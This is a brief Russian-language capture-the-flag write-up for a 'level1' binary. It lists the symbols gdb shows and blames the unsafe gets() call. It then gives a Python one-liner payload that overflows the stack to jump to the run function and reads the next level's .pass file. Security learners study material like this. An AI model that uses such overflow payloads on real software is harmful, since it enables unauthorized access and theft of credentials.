смотрим, где мы оказались и что у нас есть
    ls
    level1

запускам, без аргументами или без, скрипт ожидает ввода, после ничего не происходит

посмотрим функции через gdb:
    Non-debugging symbols:
    0x080482f8  _init
    0x08048340  gets
    0x08048340  gets@plt
    0x08048350  fwrite
    0x08048350  fwrite@plt
    0x08048360  system
    0x08048360  system@plt
    0x08048370  __gmon_start__
    0x08048370  __gmon_start__@plt
    0x08048380  __libc_start_main
    0x08048380  __libc_start_main@plt
    0x08048390  _start
    0x080483c0  __do_global_dtors_aux
    0x08048420  frame_dummy
    0x08048444  run                     <= адрес run
    0x08048480  main
    0x080484a0  __libc_csu_init
    0x08048510  __libc_csu_fini
    0x08048512  __i686.get_pc_thunk.bx
    0x08048520  __do_global_ctors_aux
    0x0804854c  _fini

проблема в функции gets:
http://www.c-cpp.ru/books/chtenie-i-zapis-strok-gets-i-puts

переполнение буфера в main приведет к тому, что адрес на return в main изменится на адрес run

проделаем это:
    python -c 'print "a" * 76 + "\x44\x84\x04\x08"'  > /tmp/level1
    cat /tmp/level1 - | ./level1
    cat /home/user/level2/.pass